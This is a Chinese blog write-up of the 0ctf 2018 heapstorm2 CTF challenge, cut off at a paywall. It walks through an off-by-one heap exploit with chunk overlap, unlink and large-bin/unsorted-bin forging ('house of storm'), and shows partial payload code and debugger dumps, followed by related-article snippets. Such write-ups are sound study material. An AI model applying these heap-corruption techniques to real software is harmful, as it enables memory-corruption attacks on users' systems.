0ctf2018_heapstorm2_reproduce

原创 已于 2022-02-23 19:06:49 修改 · 405 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #pwn

于 2022-02-23 19:06:29 首次发布
这篇文章详细介绍了ctf2018 Heapstorm2挑战中的heap溢出漏洞利用过程,涉及off-by-one攻击、chunk overlap利用、large_bin和unsorted_bin的伪造,最终实现内存控制并获取shell。作者通过实例演示了如何构造payload,以及mallopt函数和/dev/urandom在攻破中的作用。

0ctf2018_heapstorm2_reproduce

概述

打了好久,学到很多

保护全开,libc-2.24

漏洞点在 off-by-one,打法是利用 off-by-one 缩小 chunk 进行 unlink 然后就可以实现类似 uafoverlap,是 unlink 的一部分,又是还能用的这种 overlap

有了 overlap 就能实现 house of storm,也就是同时伪造 large_binbk_nextsizebkunsorted_binbk,实现可写内存的任意申请

过程

overlap chunk

先利用 off-by-one 实现缩小 chunk,再 unlink 然后就可以实现类似 uafoverlap

要进行两次,一次为了 large_bin 的伪造,一次为了 unsorted_bin 的伪造

第一次 overlap chunk

先进行布局

create(0x18)# 0
create(0x508)# 1
create(0x18)# 2

create(0x18)# 3
create(0x508)# 4
create(0x18)# 5

create(0x18)# 防止 5 进 top

然后伪造 prve_size,伪造 size

edit(1,0x4f0*b'a'+p64(0x500))# 伪造 prve_size 为 0x500
delete(1)# 被覆盖的 prev_size 恢复
edit(0,(0x18-12)*b'a')# off-by-one 伪造 size 为 0x500

请添加图片描述

创建一个 0x20 的块,再创建一个 0x4d8 块为后面 overlap 改写其他块内容做准备

# 2 overlap 7,通过 7 能改 2
create(0x18)# 1
create(0x4d8)# 7 uaf overlap

然后进行 unlink,unlink 前要 free 一下 chunk1

delete(1)# 使 prev_size 为 0x20,不然报 corrupted size vs. prev_size
delete(2)# unlink

请添加图片描述

这时候就可以 overlap

create(0x38)# 1
create(0x4e0)# 2 0x4f0 unsorted

可以看到,用 7 可以控制 2,我们后面把 2 放进 unsorted,然后就可以用 7 去改写内容了

pwndbg> x/200xg 0x558c3e47b020
0x558c3e47b020: 0x49495f4d524f5453      0x0000000000000041 <---1
0x558c3e47b030: 0x0000000000000000      0x0000000000000000
0x558c3e47b040: 0x0000000000000000      0x0000000000000000 <---7
0x558c3e47b050: 0x0000000000000000      0x0000000000000000
0x558c3e47b060: 0x0000000000000000      0x00000000000004f1 <---2

改了了 unsorted 还需要改写 large

重复一遍上面过程就行,不过 large_bin 应该要 小于 unsorted_bin,这样方便实现漏洞利用

# ? overlap 8,通过 8 能改 free块
edit(4,0x4f0*b'a'+p64(0x500))
delete(4)# 被覆盖的 prev_size 恢复
edit(3,(0x18-12)*b'a')

create(0x18)# 4
create(0x4d8)# 8 uaf overlap

delete(4)
delete(5)# unlink

create(0x48)# 4
# 0x4e0 large

放入 large_bin 和 unsorted_bin

这时候就会有一个 0x4e0 的 chunk 在 unsorted 里面,我们要让 0x4f0 的进 unsorted,让0x4e0的进 large

# 放入 large_bin 和 unsorted_bin
delete(2)
create(0x4e0)# 2
delete(2)

第一次 delete(2)

请添加图片描述

可以看到两个 chunk 都进了 unsorted

create(0x4e0) 后,因为 unsortedFIFO 的规则,会先遍历 0x4e0 的块,发现不是精确大小,就放入了 large_bin,而之后遍历 0x4f0 的块,发现符合条件,就直接返回给用户了,然后我们再 delete(2)0x4f0 的块就进了 unsorted 了,我们的目的就实现了

请添加图片描述

最低0.47元/天 解锁文章
gxhhh191
关注
【Linux】mallopt()调整malloc/new行为、控制内存分配
郭老二
03-11 1126
Linux内存分配mallopt详解
pwn challenge】0ctf_2018_heapstorm2
weixin_43960998的博客
03-02 573
程序 很早以前就想把这题做了,但是感觉特别麻烦就一直拖着了,今日参考了一位师傅然后解决。 程序先是禁用了 fastbin,让你和 mmap 了一段内存,并往该内存中读取了一串随机数,然后进行一个简单的赋值,接着通过一个 for 循环将接下来用到的存放 ptr 和 size 的地方进行了异或操作: 最终是如下效果: 然后是添加堆块功能: 利用 calloc 分配,会清空原堆块的内容,这就需要 overlap 的时候对其中的 chunk header 等进行恢复。 update 功能中存在 off b
BUUCT-PWN 0ctf_2018_heapstorm2(house of storm)
weixin_44145820的博客
04-25 1834
目录题目分析漏洞利用Exp 题目分析 这题估计是house of storm利用的起源? 因为用这种办法直接就可以做通,后面还有rctf_2019_babyheap也需要用到house of storm,但是那题限制条件多多了 init()里先把fastbin禁用了 申请了0x13370000这块内存,并且做了初始化 初始化首先读入长度为0x18的随机数,就记为3个long long随机数吧...
0ctf-2018 heapstorm2详解
极目楚天舒的博客
05-20 2332
0x01 预备知识堆相关的数据结构通过malloc得到的我们称之为chunk,每一个chunk都有一个chunk头用于管理称之为malloc_chunk,定义如下:/* This struct declaration is misleading (but accurate and necessary). It declares a "view" into memory allowing a...
0ctf_2018_heapstorm2 && rctf_2019_babyheap
qq_73149934的博客
06-14 313
分配合适的chunk,unsortedbin 剩余的一个chunk(0x4e1)是我们需要的largebin chunk,此时处于释放状态。这看似没有问题,但是注意,strcpy函数会在末尾加上null,相当于13个字节,发生了off by null。2.23-0ubuntu11house of storm,poison null byte,堆风水,堆orw。分配合适的chunk,chunk2是unsorted chunk(0x4f1),此时处于分配状态。同时,mallopt函数禁用了fastbin。
0ctf2018_heapstorm2 wp
weixin_44008345的博客
04-08 425
0ctf_2018_heapstorm2,large bin attack题
(BUUCTF0ctf_2018_heapstorm2
xy1458214551的博客
01-23 792
BUUCTF0ctf_2018_heapstorm2题解
rctf_2019_babyheap、0ctf_2018_heapstorm2学习(house of storm)
weixin_46521144的博客
09-10 1661
0ctf_2018_heapstorm2 这道题算是house of storm的起源。 house of storm的原理其实就是:结合利用largebin attack和劫持unsortedbin后一个chunk的bk,实现把堆地址写入到任意地址,再结合unsortedbin的bk指针分配时只检查size而不检查chunk完整性(这里有点疑惑,unlink检查应该很严格,可能是绕过了而不是没有检查)分配到这个地址上(add(0x48))实现的结果和unlink差不多。 具体利用条件: glibc2.3
n1ctf2018_null(通过劫持线程arena达到任意地址分配)
seaaseesa的博客
07-26 2613
n1ctf2018_null(通过劫持线程arena达到任意地址分配) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,主函数启动了一个线程 在线程里,是一个循环 其中输入函数存在溢出,由于a2没有更新,因此,如果将数据分成2部分读入的话,第二次,仍然可以读入a2个数据,从而溢出。 溢出尺寸比较大,如果能够覆盖到线程arena,那么就能将fake_chunk链接到fastbin,进而分配过去。但是arena是先mmap出来的,heap是过后才分配出来,因此,线程heap的
mallopt()--控制 内存分配的函数
热门推荐
u013920085的专栏
10-18 2万+
mallopt函数可以控制 内存分配的函数: int mallopt(int param,int value)//控制 内存分配的函数 。 param 的取值可以为M_CHECK_ACTION、M_MMAP_MAX、M_MMAP_THRESHOLD、M_MXFAST(从glibc2.3起)、M_PERTURB(从glibc2.4起)、M_TOP_PAD、M_TRIM_THRESHOLD
Linux glibc 的 mallopt 海量小内存回收问题
chendongyong的专栏
03-13 9234
一.http://blog.sina.com.cn/s/blog_4673e6030101haxg.html 最近使用ACE的Message_Block时发现,程序运行一段时间之后内存越吃越多,即便没有请求,内存也不会下降。 在使用 valgrind 排除内存泄漏之后,把怀疑的对象转到了Message_Block上。 用ACE的测试用例改了一个测试程序: #include
malloc底层实现原理
Allelujah123的博客
03-31 7373
Linux的虚拟内存管理有几个关键概念: Linux 虚拟地址空间如何分布?malloc和free是如何分配和释放内存?如何查看堆内内存的碎片情况?既然堆内内存brk和sbrk不能直接释放,为什么不全部使用 mmap 来分配,munmap直接释放呢 ? Linux的虚拟内存管理有几个关键概念:1、每个进程都有独立的虚拟地址空间,进程访问的虚拟地址并不是真正的物理地址; 2、虚拟地址可通过每个进程上的页表(在每个进程的内核虚拟地址空间)与物理地址进行映射,获得真正物理地址; 3、如果虚拟地址对应物理...
《嵌入式Linux内存与性能详解》笔记2——进程内存优化
良知犹存的博客
12-23 701
堆内存的小单位为16Byte,所以尽量减少小块内存的申请,避免内存浪费。调整,降低mmap的门槛,会降低内存空洞的风险,但也会增加系统调用,降低性能。调整,减少堆顶连续内存门槛,释放更多的堆顶内存。以上是从书中获取到的经验,但无论如何还是需要结合实际的工程需求来做优化,希望可以帮到各位读者尽量避免在使用频率低的栈空间申请大量内存尽量避免使用递归函数最后附上一张函数栈帧结构图函数栈帧结构图ELF文件是 linux 下的可执行文件格式,包括可定位文件(.o)静态库(.a)共享库(.so)和。
头文件malloc.h:函数 mallopt()的选项
阿群的笔记(同步备份自简书)
02-21 2306
下面以一个例子来说明内存分配的原理: 情况一、malloc小于128k的内存,使用brk分配内存,将_edata往高地址推(只分配虚拟空间,不对应物理内存(因此没有初始化),第一次读/写数据时,引起内核缺页中断,内核才分配对应的物理内存,然后虚拟地址空间建立映射关系),如下图: 1、进程启动的时候,其(虚拟)内存空间的初始布局如图1所示。 其中,mmap内存映射文件是在堆和栈的中间...
mallopt change malloc/new action
人体运动、生物特征、高性能移动计算、人性化智能交互
02-04 1629
使用new/delete: int32_t i = 0; std::queue vTest; for (i = 0; i {     char *p = new char[100];     vTest.push(p);     char *p1 = vTest.front();     delete[] p1;     vTest.pop(); } 当在一个循环内,如果申
mallopt\malloc_trim\malloc_stats
chuanlanduo2145的博客
10-17 583
malloptis a library call that allows a program to change the behavior of the malloc memory allocator. ⁠ ExampleA.1.Allocator heuristics An al...
Linux内存分配机制
weixin_30294021的博客
05-30 307
原文:https://blog.youkuaiyun.com/gfgdsg/article/details/42709943 Linux 的虚拟内存管理有几个关键概念: 1、每个进程都有独立的虚拟地址空间,进程访问的虚拟地址并不是真正的物理地址;2、虚拟地址可通过每个进程上的页表(在每个进程的内核虚拟地址空间)与物理地址进行映射,获得真正物理地址;3、如果虚拟地址对应物理地址不在物理内存中,则产生缺...
mallopt函数说明
Hedpat's Blog | 黯風夜隱
01-10 2496
mallopt - set memory allocation parameters #include int mallopt(int param, int value); The mallopt() function adjusts parameters that control the behav
large bin attack & house of strom
seaaseesa的博客
06-12 1397
large bin attack & house of strom large bin attack是一种堆利用手法,而house of strom则是在large bin attack的基础上借用unsorted bin来达到任意地址分配,首先我们从源码入手来分析large bin attack原理,然后再讲讲house of strom的原理,接着再看几个题目。 为例方便分析,以2.23为例,新版本有tcache的情况类似,只需填满tcache bin绕过tcache即可。 在free的时
babyheap_0ctf_2017
最新发布
04-02
嗯,用户需要关于babyheap_0ctf_2017的解题思路或资料。首先,我得回忆一下这个题目的基本情况。Babyheap是2017年0CTF的一道堆利用题目,属于Pwn方向,主要考察堆管理机制和漏洞利用。 首先,这个题目的保护机制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值